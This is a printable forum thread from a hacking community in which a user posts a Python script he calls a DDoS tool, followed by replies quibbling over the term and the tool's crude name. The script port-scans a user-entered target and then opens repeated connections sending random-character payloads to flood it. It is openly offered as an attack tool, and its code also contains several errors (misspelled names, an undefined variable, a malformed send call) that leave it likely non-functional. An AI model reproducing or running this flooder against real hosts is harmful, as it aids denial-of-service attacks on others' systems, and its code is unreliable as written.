![]() |
|
The Cheerio-Shitter - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Python (https://sinister.ly/Forum-Python) +--- Thread: The Cheerio-Shitter (/Thread-The-Cheerio-Shitter) Pages:
1
2
|
The Cheerio-Shitter - Equinox - 03-06-2014 Basically this is a DDoS tool that I made. It utilizes my password generator code, a port scanner and DDoS tool. Run down: Scans ports 1 - 100, if no open port is found, it defaults to port 80. Makes a message with a random length ranging between 50 and 500 digits of random characters. Sends a random amount of packets(50 - 500) to the target. I call it the Cheerio-Shitter because this is the last(probably), most powerful DDoS tool I've ever made. Assuming it works that is. Code: #Cheerio-Shitter DDoS Tool, programmed by Duubz
import os,sys,time,socket,string,random
target_req = input("Target: ")
target = socket.gethostbyname(target_req)
openports = []
def portscan(address,port):
x = socket.socket()
try:
x.connect((target,port))
print("{0}".format(port))
openports[1:1] = [port]
return True
except socket.error:
return False
x.close()
for port in range(1,100):
portscan(target,port)
print("Open Ports: {0}".format(openports))
if port in openports > 0:
port_choice = random.choice(openports)
else:
port_choice = '80'
randompack_length = random.randint(50,500)
randompack_chars = string.ascii_letts + string.digits + '~!@#$%^&*()_+'
random.seed = (os.urandom(1024))
randompack = " ".join(random.choice(randompack_chars) for i in range(length)).replace(" ","")
randinst = random.randint(50,500)
port = port_choice
packet = randompack
instances = randinst
def dos():
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
x.connect((target,port))
x.send(packet)
x.sendto(packet(target,port))
x.send(packet);
except socket.error:
print("Socket error, failed to launch.")
x.close()
for i in range(1,instances):
dos()This is a night thread for me, basically I don't have much time to tell too much details. Hope you like the cheerio-shitter. RE: The Cheerio-Shitter - Eclipse - 03-06-2014 It's not really DDoS, It's actually DoS, but it looks cool. I'll check it out. RE: The Cheerio-Shitter - Cressi - 03-06-2014 (03-06-2014, 07:59 AM)Aurora Wrote: It's not really DDoS, It's actually DoS Agreed, but it is indeed a neat little program you've made there ^^ RE: The Cheerio-Shitter - 3SidedSquare - 03-06-2014 Cool! A syn dos! But that feel when no object oriented RE: The Cheerio-Shitter - Satan - 03-06-2014 I do question where the name came from. RE: The Cheerio-Shitter - Equinox - 03-06-2014 (03-06-2014, 02:55 PM)3SidedSquare Wrote: Cool! A syn dos! It's a sad feeling, mang. I know chur pain. (03-06-2014, 02:59 PM)Satan Wrote: I do question where the name came from. So you can shit the cheerios of your target. AW: RE: The Cheerio-Shitter - Satan - 03-06-2014 (03-06-2014, 03:02 PM)Duubz Wrote: So you can shit the cheerios of your target. Still don't understand but okay. RE: The Cheerio-Shitter - Equinox - 03-06-2014 (03-06-2014, 03:03 PM)Satan Wrote: Still don't understand but okay. Typically when using the term "you shit their cheerios", it means you've angered someone. AW: RE: The Cheerio-Shitter - Satan - 03-06-2014 (03-06-2014, 03:04 PM)Duubz Wrote: Typically when using the term "you shit their cheerios", it means you've angered someone. I've only heard "who's pissed in your cereal then?" RE: The Cheerio-Shitter - Equinox - 03-06-2014 (03-06-2014, 03:09 PM)Satan Wrote: I've only heard "who's pissed in your cereal then?" Consider shitting people's cheerios an alternative. |